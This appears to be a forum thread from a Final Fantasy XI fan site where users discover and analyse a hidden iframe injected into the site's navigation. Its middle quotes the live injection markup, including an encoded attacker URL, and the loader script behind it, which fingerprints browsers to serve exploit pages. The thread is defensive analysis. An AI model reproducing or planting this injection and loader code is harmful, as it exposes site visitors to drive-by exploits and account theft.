IFRAME On FFXIAH? :o |
||
IFRAME on FFXIAH? :o
Looks like AIDS to me!
Uhh... that's an iframe injection that takes advantage of a weakness in IE where it will decode that url and follow it to the payload.
Microsoft has not patched this in many versions because: A) They are lazy idiots. B) "It's not a bug, it's a feature!" C) All of the above. Give me a couple mins, I'll decode that domain... edit: seovery[dot]zzl[dot]org The URL would puport to be for SEO purposes, but the method used is pretty useless for SEO purposes since it only works on IE. The scripts generated don't really stick out as being bad, but I would certainly err on the side of caution and not come to FFXIAH on IE until this is resolved by the admins. Better yet, STOP USING IE. http://www.mozilla.com/ http://www.google.com/chrome http://www.opera.com/ Midgardsormr.Sammitch said: Uhh... that's an iframe injection that takes advantage of a weakness in IE where it will decode that url and follow it to the payload. Microsoft has not patched this in many versions because: A) They are lazy idiots. B) "It's not a bug, it's a feature!" C) All of the above. Give me a couple mins, I'll decode that domain... Well hopefully this gets taken care of soon. :(
Midgardsormr.Sammitch said: Oh, yeah I suppose. Reading the ascii table works just as well though. :P
I'm troubled that this is in the site itself rather than an ad... Midgardsormr.Sammitch said: Oh, yeah I suppose. Reading the ascii table works just as well though. :P I'm troubled that this is in the site itself rather than an ad... AdBlock + NoScript, your very best friend!
Firefox + AdBlock + NoScript
Google Chrome/Opera + Privoxy/AdSweep - link here Internet Explor + IE7pro addon/AdSweep CONFLICT RESOLVED. www.seovery.noyou server location:
Shanghai in China lol. Midgardsormr.Sammitch said: Uhh... that's an iframe injection that takes advantage of a weakness in IE where it will decode that url and follow it to the payload. Microsoft has not patched this in many versions because: A) They are lazy idiots. B) "It's not a bug, it's a feature!" C) All of the above. D) PS2 Limitations I also have that.. When i click on browse, at the top it says "Browse Iframe" and a load of links, my Noscript / addblock+ is not picking anything up, but there is a small rectangle next to the the browse button..
I don't have any problem with that on IE8 or Google Chrome .
Try this Shiva.Darkshade said: Firefox - AdBlock + NoScript Google Chrome/Opera - Privoxy/AdSweep - link here Internet Explor - IE7pro addon/AdSweep CONFLICT RESOLVED. I have Firefox - AdBlock + NoScript it is still there, a little rectangle next to the browse link, and when i click it, it takes me to a page that looks the same, but in the top bar of Firefox, it says Iframe and a load of numbers etc..
I'm getting the same thing actually. And no, it's not IE. Firefox with noscript + adblock. Getting past everything. :(
Don't forget noscript is useless unless you also make sure you have iframes blocked. They are not by default.
It is under my recently blocked sites, yet when i click browse i still get the same result.
The little box appeared for me too. I blocked frames and iframes and now I'm getting the lil shark like Hypnotizd.
Don't know what it is, but assume it's not nice. Tiny iframes like that rarely are. Block it until we know it's there for a legit purpose. Yea it looks like its tagged right onto the browse link.
Code <div class="sideMenuitem"><a tabindex="7" href="/browse.php" class=menu>Browse<iframe src=http://%73%65%6F%76%65%72%79%2E%7A%7A%6C%2E%6F%72%67/1/ width=0 height=0></iframe> </a></div> The URL source is: Code <script> window.status=''; if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x69\x65 \x38")!=-1) location.replace("\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B"); </script> <script type="text/javascript" src="swfobject.js"></script> <script> var version = deconcept.SWFObjectUtil.getPlayerVersion(); if(version['major']>=10 && version['rev']>31 || version['major']<9) {nav=navigator.userAgent.toLowerCase(); wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1)); if(wxp&&nav.indexOf("m"+"s"+"ie 6")!=-1) { document.write("<iframe frameborder=0 src=" + "ie7.htm width=468 height=60 scrolling=no></iframe>"); document.write("<iframe frameborder=0 src=" + "BDA.htm width=468 height=60 scrolling=no></iframe>"); } } else{ if(navigator.userAgent.toLowerCase().indexOf("msie")>0) { document.write("<iframe src=ie.html frameborder=0 width=468 height=60></iframe>"); } else{document.write("<iframe src=ff.html frameborder=0 width=468 height=60></iframe>");} } </script> <script src="http://s175.cnzz.com/stat.php?id=1873312&web_id=1873312" language="JavaScript" charset="gb2312"></script> If you lookup a line of that (I looked up "location.replace("\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B");"), you will get a bunch of IE 0day exploit techniques. This happened to me years ago and I had to uninstall firefox completely including registry etc., then reinstalled it.
Did you guys reinstall it? Er, it's nothing to do with Firefox Alyria. It's in the page's source. It's actually embedded into the page itself that's hosted on the site.
Also, it's not just Firefox. It's in Chrome and IE too. Then uninstall the add-ons until Scragg is back from vacation. I don't have an issue here on either one.
Gilgamesh.Alyria said: Then uninstall the add-ons until Scragg is back from vacation. I don't have an issue here on either one. The add ons are nothing to do with this. The add ons are blocking it because we don't know if it's legit. Seriously not a good iea to tell people to uninstall noscript when there's an unnaccounted for Iframe you don't know the purpose of on the site. It's not even in an advert or anything. It's actually on the site. Don't be a douche to me, I only said until Scragg gets back. If its really interfering with a lot and bugging, then you would have to uninstall until Scragg gets back. Or turn it off for this site.
Gilgamesh.Alyria said: Then uninstall the add-ons until Scragg is back from vacation. I don't have an issue here on either one. Gilgamesh.Alyria said: Don't be a douche to me, I only said until Scragg gets back. If its really interfering with a lot and bugging, then you would have to uninstall until Scragg gets back. Or turn it off for this site. What on earth did I do that was douchely there? :s If Scragg is on holiday, even more reason NOT TO UNINSTALL NOSCRIPT since he obviously didn't add the iframe. Uninstalling it is going to stop your browser blocking it, and since nobody, including you, know if it's there for legit reasons or not, advising people to uninstall is horrific advice. If that's being a douchebag, whatever. I'd sooner be a douchebag and make people not uninstall noscript than potentially compromise their computers or playonline accounts! Shiva.Nightraid
Offline
Gilgamesh.Alyria said: Don't be a douche to me, I only said until Scragg gets back. If its really interfering with a lot and bugging, then you would have to uninstall until Scragg gets back. Or turn it off for this site. Theres a Virus/Keylogger Iframe embedded in the Site Alyria :/ |
||
All FFXI content and images © 2002-2024 SQUARE ENIX CO., LTD. FINAL
FANTASY is a registered trademark of Square Enix Co., Ltd.
|